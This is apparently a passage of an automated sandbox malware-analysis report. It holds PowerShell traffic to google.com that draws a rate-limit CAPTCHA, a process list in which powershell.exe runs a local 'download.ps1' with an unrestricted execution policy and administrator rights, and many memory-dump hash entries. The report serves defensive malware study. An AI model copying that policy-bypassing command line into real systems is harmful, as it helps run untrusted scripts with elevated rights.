                                                                  Set-Cookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA; expires=Mon, 23-Jun-2025 12:48:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/
                                                                  Dec 22, 2024 13:48:13.862046957 CET338INData Raw: 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20
                                                                  Data Ascii: html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazq
                                                                  Dec 22, 2024 13:48:13.863940954 CET524OUTGET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Cookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA
                                                                  Dec 22, 2024 13:48:14.007707119 CET1289INHTTP/1.1 429 Too Many Requests
                                                                  Date: Sun, 22 Dec 2024 12:48:13 GMT
                                                                  Pragma: no-cache
                                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Content-Type: text/html
                                                                  Server: HTTP server (unknown)
                                                                  Content-Length: 3076
                                                                  X-XSS-Protection: 0
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                                  Dec 22, 2024 13:48:14.007796049 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                                  Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="V-Kwt5F2Fi5OcZBsJjgZ--hDZdB0fEH0MTujz4c_bSW4kMZ1nRBTpbOh3Y4X8rAPVTWOGtVDPKEAblMD9PsGtd82Euc45EspBYFr_2UlDT2Q_5TLtJ4uIxbVrHJy_bgOdLNd7mYX8Z2vWbYtrsG0pm9
                                                                  Dec 22, 2024 13:48:14.008057117 CET778INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                                  Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:07:48:09
                                                                  Start date:22/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                  Imagebase:0x7ff755d00000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:07:48:09
                                                                  Start date:22/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff605c10000
                                                                  File size:875'008 bytes
                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137619832431.00007FFBEAA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEAA60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbeaa60000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6F$6F$Xzp#$Xzp#$Xzp#$Xzp#$p!l#
                                                                    • API String ID: 0-1814197275
                                                                    • Opcode ID: 3b94bd9eebe5f993a78f31c71aa57e362411feb972defa3bd04454fc8beb4c91
                                                                    • Instruction ID: 3466a3c39b254dd3c6e701819bc0764b232d31f1c6d9f0a4918307e27a3b22b9
                                                                    • Opcode Fuzzy Hash: 3b94bd9eebe5f993a78f31c71aa57e362411feb972defa3bd04454fc8beb4c91
                                                                    • Instruction Fuzzy Hash: B292F461A0CB9A4FEB95EB28C85576477E6EF95704F1811F9C00DC72C3DE28AC46CB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137616047463.00007FFBEA7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEA7F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbea7f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a488b4e3c878df7e76fe4e69d0abfe2c98ac811f83a9f2cb9d39fc544a31939c
                                                                    • Instruction ID: 1a3d22e66fb16d2b14a110f8340b712e5f6d7bb3a0f8390baed21266e5a21cae
                                                                    • Opcode Fuzzy Hash: a488b4e3c878df7e76fe4e69d0abfe2c98ac811f83a9f2cb9d39fc544a31939c
                                                                    • Instruction Fuzzy Hash: 48F1B67090CA4D8FEBA8DF28C8557E977E1FF55310F04426EE84EC7291DB74A9858B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137616047463.00007FFBEA7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEA7F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbea7f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 668665300f0b529b80b84d9796d70008834e0396c5c92fa968624d002ad63858
                                                                    • Instruction ID: 248f4cc87bd7c01a77ec1ff71c0e6c7dfaa3a5301287433508bafcbe97fb9371
                                                                    • Opcode Fuzzy Hash: 668665300f0b529b80b84d9796d70008834e0396c5c92fa968624d002ad63858
                                                                    • Instruction Fuzzy Hash: 51E19670908A4D8FEBA8EF28C8557E977E1FF54310F04426ED84EC7295DF7499858B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137616047463.00007FFBEA7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEA7F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbea7f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4741e169a503c280df14a381256dc6e5d9a07d7afb482cba29072a5c2b41e78
                                                                    • Instruction ID: a55d09a44bec05eb4c1498513b74c84353a0de0cb01bb85f27f7e73fa214e5a0
                                                                    • Opcode Fuzzy Hash: a4741e169a503c280df14a381256dc6e5d9a07d7afb482cba29072a5c2b41e78
                                                                    • Instruction Fuzzy Hash: 96B1957050CA4D4FEBA8EF28D8557E93BE1FF55310F04426EE84EC7692CA749985CB82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137620315700.00007FFBEAAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEAAA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbeaaa0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 061724cad43215d4703e6dff328ff32107b5e200236c8c1b86e442b85841e950
                                                                    • Instruction ID: 8378aa596f04b491ea80b4e594cc49235a38f405bf6e45334b8adc7039665c71
                                                                    • Opcode Fuzzy Hash: 061724cad43215d4703e6dff328ff32107b5e200236c8c1b86e442b85841e950
                                                                    • Instruction Fuzzy Hash: EF913862B0CB9A4FE7A9E73894553753BDBEF45310B1801FAD04DC71A3DE18AC5A8782
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137615491017.00007FFBEA6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEA6DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbea6dd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac2305ea56a00199652e48a86edca3e2d96f27609b476cd25b1f56f591224bae
                                                                    • Instruction ID: 885383dcc89fbd5041e1a434a04cd32280c79c3ad034012d208f48c70b9b6aa8
                                                                    • Opcode Fuzzy Hash: ac2305ea56a00199652e48a86edca3e2d96f27609b476cd25b1f56f591224bae
                                                                    • Instruction Fuzzy Hash: 1541E07180DBC48FD7569B399C45A523FF4EF57220B1906DFD088CB1A3D625A84AC7A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137620315700.00007FFBEAAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEAAA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbeaaa0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04add1b9b4ef275b8d51dd6d24495b2e581bb6c15949f0f93c9a6cc80ac2fed6
                                                                    • Instruction ID: 7c986464805e361f865d975b86a5987db41243867634cc19f9f4b88f8e0cfecd
                                                                    • Opcode Fuzzy Hash: 04add1b9b4ef275b8d51dd6d24495b2e581bb6c15949f0f93c9a6cc80ac2fed6
                                                                    • Instruction Fuzzy Hash: 8F310462F1DB5A4BE6A9E728D49137436DFEF44310B1811FAD40DC31A7DF18AC6A8286
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137616047463.00007FFBEA7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEA7F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbea7f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a6cbfe54cb29dc453c8882a70eea3da03ee9720d2525f03a7bdc7adb727607cd
                                                                    • Instruction ID: 6bebd365c68d2dfb7b2eadfaafd9190fb3bd040e12a58c7f1148adc59e8cc340
                                                                    • Opcode Fuzzy Hash: a6cbfe54cb29dc453c8882a70eea3da03ee9720d2525f03a7bdc7adb727607cd
                                                                    • Instruction Fuzzy Hash: D631907191CB4C8FDB1CDB5CA84A6A97BE0FBA8721F00426FE449D3251DA70A8558BC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137616047463.00007FFBEA7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEA7F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbea7f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 276eddbb128c836776fea958af87e2cca5e34a79aa3534fc965b696d858c3d86
                                                                    • Instruction ID: aa78008c0b98dcd6a7aefe99235e40b9ec5dd975439ef53ff293a83350ee75a9
                                                                    • Opcode Fuzzy Hash: 276eddbb128c836776fea958af87e2cca5e34a79aa3534fc965b696d858c3d86
                                                                    • Instruction Fuzzy Hash: 7421343090CB4C8FEB49DBA8984A7E97BE0EB96320F00426FD449C3152DA74A416CB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137616047463.00007FFBEA7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEA7F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbea7f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 838ade822e158794e7c6777702e8c92236a9169b59e616e93d0e68a7f738f6e7
                                                                    • Instruction ID: 8433465a620eebb52c8148754f9d3729461a9d94ef2afecac0522c6178cb3778
                                                                    • Opcode Fuzzy Hash: 838ade822e158794e7c6777702e8c92236a9169b59e616e93d0e68a7f738f6e7
                                                                    • Instruction Fuzzy Hash: 9231FA7081865E8EFBB4EF35CC8ABF932D9FF42315F401179D40E86192DAB86985CB12
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137616047463.00007FFBEA7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEA7F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbea7f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7a4ea161f9e72c3ddb0262dbe0b820b5e1f17815f6f40dbd2cfb4b57bafffc5
                                                                    • Instruction ID: bf8e8f89a07da79c003c7f9fcb6cd46bef28d46c083e29d76c16e963fefc1e82
                                                                    • Opcode Fuzzy Hash: c7a4ea161f9e72c3ddb0262dbe0b820b5e1f17815f6f40dbd2cfb4b57bafffc5
                                                                    • Instruction Fuzzy Hash: 8801677111CB0C8FD744EF0CE451AA5B7E0FB95324F10056EE58AC3665D636E892CB46
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.137616047463.00007FFBEA7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBEA7F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffbea7f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 90cd52ffc59f504539509e8d3832643453d0f1236b64f7e2ed9a4e54770fd265
                                                                    • Instruction ID: 9354448311de8306f88db7dc67a5fe518e864aec34ea78097a67315190454bb6
                                                                    • Opcode Fuzzy Hash: 90cd52ffc59f504539509e8d3832643453d0f1236b64f7e2ed9a4e54770fd265
                                                                    • Instruction Fuzzy Hash: 0FF0B43080C6C98FDB0ADF3888595D57FA0EF26210B0502DBE859C71A2DB649458CB92